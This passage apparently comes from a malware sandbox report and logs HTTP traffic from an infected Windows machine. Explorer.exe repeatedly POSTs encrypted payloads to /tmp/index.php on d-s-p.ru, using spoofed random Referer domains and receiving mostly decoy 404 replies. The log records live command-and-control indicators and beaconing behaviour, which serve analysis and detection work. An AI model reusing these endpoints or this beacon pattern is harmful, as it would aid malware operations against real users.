                                                                                                                                                                                Dec 30, 2024 19:42:48.951006889 CET273OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 2b 3c d0 bb
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vu+<mWYn@L0;fTJ:tI\]&)04D4t`^%:1};)B,G>fwwuq\i2WEp7Y
                                                                                                                                                                                Dec 30, 2024 19:42:50.394676924 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:50 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                19192.168.2.44975558.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:50.480118036 CET279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://htevegfcswyxd.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 227
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:50.480182886 CET227OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 59 5b d9 93
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vuY[zXpy`_![eVRhw4j9_O+@Ct(^U*J o[[luUhIXyxsp.
                                                                                                                                                                                Dec 30, 2024 19:42:52.207444906 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:51 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                20192.168.2.44975758.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:52.217294931 CET278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://hxhrbhxaiegx.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 238
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:52.217294931 CET238OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 27 07 ee ad
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vu'yMVS[vcL`4O?bmFG@9NoV>^#1bM.{BMs-V }uZ_*Z{eln
                                                                                                                                                                                Dec 30, 2024 19:42:53.671240091 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:53 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                21192.168.2.44975858.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:53.737289906 CET278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://nysccihvdkds.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 251
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:53.737310886 CET251OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 3e 49 f3 ed
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vu>IJLwdlkR%q+B|CbKiFIFPvgzD!8QzXD]*J#.jRR8x$NT9j
                                                                                                                                                                                Dec 30, 2024 19:42:55.176757097 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:54 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 63 42 f3 31 04 ed f1 49 f6 9d ed e4 21 9b 23 9a e8 31 55 12 c3 89 9b c2 63 9a 3b 0d 16
                                                                                                                                                                                Data Ascii: #\6cB1I!#1Uc;


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                22192.168.2.44984158.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:43:07.653389931 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://grgynsvjunbdyj.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 147
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:43:07.653423071 CET147OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 7c 0a d4 a9
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vu|%`{Gjws@du&/U05JWQ(TN
                                                                                                                                                                                Dec 30, 2024 19:43:09.099405050 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:43:08 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                23192.168.2.44984958.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:43:09.106652021 CET277OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://rkeqfvulevu.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 333
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:43:09.106662035 CET333OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 7a 1c a1 98
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vuzbhSi;]bX,a3)zY^0|CI@\OabJ8Y[2}lOyR0$iR'CO>*x
                                                                                                                                                                                Dec 30, 2024 19:43:10.549905062 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:43:10 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                24192.168.2.44985958.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:43:10.566921949 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://paiaccswdvwaulm.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 193
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:43:10.566961050 CET193OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 27 0b a3 a3
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vu'r"C\T.$=u.Y6;ea.QMZ9p'N*AZV
                                                                                                                                                                                Dec 30, 2024 19:43:12.024653912 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:43:11 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                25192.168.2.44986958.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:43:12.032145023 CET279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://ecpopbfcnylhn.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 124
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:43:12.032157898 CET124OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 6e 24 dd b5
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vun$,z]wv=EOy>7Mq
                                                                                                                                                                                Dec 30, 2024 19:43:13.485539913 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:43:13 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                26192.168.2.44988058.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:43:13.593446970 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://wgfecinevmagrs.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 131
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:43:13.593468904 CET131OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 76 1c d9 ab
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vuv$vlnDVp{qX?AQ
                                                                                                                                                                                Dec 30, 2024 19:43:15.049071074 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:43:14 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                27192.168.2.44989158.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:43:15.059665918 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://wgggkliaxflrlukv.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 339
                                                                                                                                                                                Host: d-s-p.ru
